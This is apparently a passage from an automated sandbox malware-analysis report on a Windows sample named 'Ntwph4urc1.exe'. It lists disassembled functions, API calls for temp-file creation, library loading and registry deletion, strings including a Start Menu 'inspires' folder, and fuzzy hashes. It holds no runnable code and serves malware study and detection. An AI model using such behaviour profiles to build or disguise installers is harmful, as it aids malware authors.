                                              • Executed
                                              • Not Executed
                                              control_flow_graph 863 405925-405970 CreateDirectoryW 864 405972-405974 863->864 865 405976-405983 GetLastError 863->865 866 40599d-40599f 864->866 865->866 867 405985-405999 SetFileSecurityW 865->867 867->864 868 40599b GetLastError 867->868 868->866
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                              • GetLastError.KERNEL32 ref: 0040597C
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                              • GetLastError.KERNEL32 ref: 0040599B
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                              • C:\Users\user\Desktop, xrefs: 00405925
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                              • API String ID: 3449924974-1229045261
                                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                              • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                              • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9
                                              Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 869 406773-406793 GetSystemDirectoryW 870 406795 869->870 871 406797-406799 869->871 870->871 872 4067aa-4067ac 871->872 873 40679b-4067a4 871->873 875 4067ad-4067e0 wsprintfW LoadLibraryExW 872->875 873->872 874 4067a6-4067a8 873->874 874->875
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                              • wsprintfW.USER32 ref: 004067C5
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                              • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                              • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                              • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8
                                              Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 876 40324c-403263 877 403265 876->877 878 40326c-403275 876->878 877->878 879 403277 878->879 880 40327e-403283 878->880 879->880 881 403293-4032a0 call 403444 880->881 882 403285-40328e call 40345a 880->882 886 403432 881->886 887 4032a6-4032aa 881->887 882->881 888 403434-403435 886->888 889 4032b0-4032d6 GetTickCount 887->889 890 4033dd-4033df 887->890 893 40343d-403441 888->893 894 40343a 889->894 895 4032dc-4032e4 889->895 891 4033e1-4033e4 890->891 892 40341f-403422 890->892 891->894 896 4033e6 891->896 899 403424 892->899 900 403427-403430 call 403444 892->900 894->893 897 4032e6 895->897 898 4032e9-4032f7 call 403444 895->898 902 4033e9-4033ef 896->902 897->898 898->886 910 4032fd-403306 898->910 899->900 900->886 908 403437 900->908 905 4033f1 902->905 906 4033f3-403401 call 403444 902->906 905->906 906->886 913 403403-40340f call 405f96 906->913 908->894 912 40330c-40332c call 40693e 910->912 918 403332-403345 GetTickCount 912->918 919 4033d5-4033d7 912->919 920 403411-40341b 913->920 921 4033d9-4033db 913->921 922 403390-403392 918->922 923 403347-40334f 918->923 919->888 920->902 928 40341d 920->928 921->888 926 403394-403398 922->926 927 4033c9-4033cd 922->927 924 403351-403355 923->924 925 403357-403388 MulDiv wsprintfW call 405456 923->925 924->922 924->925 933 40338d 925->933 930 40339a-4033a1 call 405f96 926->930 931 4033af-4033ba 926->931 927->895 932 4033d3 927->932 928->894 936 4033a6-4033a8 930->936 935 4033bd-4033c1 931->935 932->894 933->922 935->912 937 4033c7 935->937 936->921 938 4033aa-4033ad 936->938 937->894 938->935
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CountTick$wsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 551687249-2449383134
                                              • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                              • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                              • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                              • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA
                                              Function 00405F13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 939 405f13-405f1f 940 405f20-405f54 GetTickCount GetTempFileNameW 939->940 941 405f63-405f65 940->941 942 405f56-405f58 940->942 944 405f5d-405f60 941->944 942->940 943 405f5a 942->943 943->944
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405F31
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Ntwph4urc1.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                              Strings
                                              • nsa, xrefs: 00405F20
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                              • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 00405F13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-1052868259
                                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                              • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                              • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58
                                              Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 945 402e41-402e6a call 40625b 947 402e6f-402e73 945->947 948 402f24-402f28 947->948 949 402e79-402e7d 947->949 950 402ea2-402eb5 949->950 951 402e7f-402ea0 RegEnumValueW 949->951 953 402ede-402ee5 RegEnumKeyW 950->953 951->950 952 402f09-402f17 RegCloseKey 951->952 952->948 954 402eb7-402eb9 953->954 955 402ee7-402ef9 RegCloseKey call 4067e3 953->955 954->952 956 402ebb-402ecf call 402e41 954->956 961 402f19-402f1f 955->961 962 402efb-402f07 RegDeleteKeyW 955->962 956->955 963 402ed1-402edd 956->963 961->948 962->948 963->953
                                              APIs
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseEnum$DeleteValue
                                              • String ID:
                                              • API String ID: 1354259210-0
                                              • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                              • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                              • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                              • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8
                                              Function 73F51777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 964 73f51777-73f517b6 call 73f51b5f 968 73f518d6-73f518d8 964->968 969 73f517bc-73f517c0 964->969 970 73f517c2-73f517c8 call 73f5239e 969->970 971 73f517c9-73f517d6 call 73f523e0 969->971 970->971 976 73f51806-73f5180d 971->976 977 73f517d8-73f517dd 971->977 978 73f5182d-73f51831 976->978 979 73f5180f-73f5182b call 73f525b5 call 73f515b4 call 73f51272 GlobalFree 976->979 980 73f517df-73f517e0 977->980 981 73f517f8-73f517fb 977->981 985 73f51833-73f5187c call 73f515c6 call 73f525b5 978->985 986 73f5187e-73f51884 call 73f525b5 978->986 1002 73f51885-73f51889 979->1002 983 73f517e2-73f517e3 980->983 984 73f517e8-73f517e9 call 73f52af8 980->984 981->976 987 73f517fd-73f517fe call 73f52d83 981->987 990 73f517e5-73f517e6 983->990 991 73f517f0-73f517f6 call 73f52770 983->991 997 73f517ee 984->997 985->1002 986->1002 1000 73f51803 987->1000 990->976 990->984 1001 73f51805 991->1001 997->1000 1000->1001 1001->976 1006 73f518c6-73f518cd 1002->1006 1007 73f5188b-73f51899 call 73f52578 1002->1007 1006->968 1012 73f518cf-73f518d0 GlobalFree 1006->1012 1014 73f518b1-73f518b8 1007->1014 1015 73f5189b-73f5189e 1007->1015 1012->968 1014->1006 1017 73f518ba-73f518c5 call 73f5153d 1014->1017 1015->1014 1016 73f518a0-73f518a8 1015->1016 1016->1014 1018 73f518aa-73f518ab FreeLibrary 1016->1018 1017->1006 1018->1014
                                              APIs
                                                • Part of subcall function 73F51B5F: GlobalFree.KERNEL32(?), ref: 73F51DD4
                                                • Part of subcall function 73F51B5F: GlobalFree.KERNEL32(?), ref: 73F51DD9
                                                • Part of subcall function 73F51B5F: GlobalFree.KERNEL32(?), ref: 73F51DDE
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51825
                                              • FreeLibrary.KERNEL32(?), ref: 73F518AB
                                              • GlobalFree.KERNELBASE(00000000), ref: 73F518D0
                                                • Part of subcall function 73F5239E: GlobalAlloc.KERNEL32(00000040,?), ref: 73F523CF
                                                • Part of subcall function 73F52770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73F517F6,00000000), ref: 73F52840
                                                • Part of subcall function 73F515C6: wsprintfW.USER32 ref: 73F515F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                              • String ID:
                                              • API String ID: 3962662361-3916222277
                                              • Opcode ID: e84af34dba3af4551a76097207dd20443275afeef33c2b7c69b4ac8cececa747
                                              • Instruction ID: 6c8554dc92ead92cd1fd53b547bc6c89b0029ba09e3587ffec020969132988cf
                                              • Opcode Fuzzy Hash: e84af34dba3af4551a76097207dd20443275afeef33c2b7c69b4ac8cececa747
                                              • Instruction Fuzzy Hash: FE41937240070AEBDF219F749D84B9A3BECBB043D1F184565FD0B9A1C6DB78A188C7A0
                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                              • API String ID: 1892508949-1275373446
                                              • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                              • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                              • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                              • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                              Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,762323A0), ref: 004054B1
                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402189
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
